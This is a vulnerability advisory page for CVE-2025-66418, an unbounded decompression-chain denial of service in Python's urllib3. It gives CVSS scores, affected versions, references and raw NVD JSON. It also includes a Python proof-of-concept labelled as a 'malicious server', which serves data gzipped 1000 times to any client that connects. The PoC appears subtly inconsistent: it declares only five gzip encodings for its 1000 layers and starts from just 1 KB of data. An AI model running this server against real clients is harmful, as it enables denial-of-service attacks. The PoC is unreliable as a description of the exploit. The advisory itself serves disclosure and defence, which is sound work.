CVE-2025-66418

Description

urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. This vulnerability is fixed in 2.6.0.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:python:urllib3:*:*:*:*:*:*:*:* - VULNERABLE

urllib3 >= 1.24, < 2.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import http.server
import gzip
import threading
import time

class DecompressionBombHandler(http.server.BaseHTTPRequestHandler):
    """
    Malicious server that exploits CVE-2025-66418
    Creates an infinite decompression chain to cause DoS
    """
    def do_GET(self):
        # Generate decompression bomb with many nested compression layers
        data = b'X' * 1024  # Small initial data
        
        # Create chain of 1000 compressed layers
        for i in range(1000):
            data = gzip.compress(data)
        
        self.send_response(200)
        # Send with multiple Content-Encoding headers
        self.send_header('Content-Encoding', 'gzip, gzip, gzip, gzip, gzip')
        self.send_header('Content-Length', str(len(data)))
        self.end_headers()
        self.wfile.write(data)
    
    def log_message(self, format, *args):
        pass  # Suppress logging

def start_server(port=8888):
    server = http.server.HTTPServer(('0.0.0.0', port), DecompressionBombHandler)
    print(f'Malicious server running on port {port}')
    server.serve_forever()

if __name__ == '__main__':
    start_server()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66418
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66418
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66418/
[4] VulDB https://vuldb.com/cve/CVE-2025-66418
[5] https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8
[6] https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66418", "sourceIdentifier": "[email protected]", "published": "2025-12-05T16:15:51.053", "lastModified": "2025-12-10T16:08:32.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. This vulnerability is fixed in 2.6.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:urllib3:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.24", "versionEndExcluding": "2.6.0", "matchCriteriaId": "AE1F753E-4D9D-48B1-B893-B3FD39917478"}]}]}], "references": [{"url": "https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}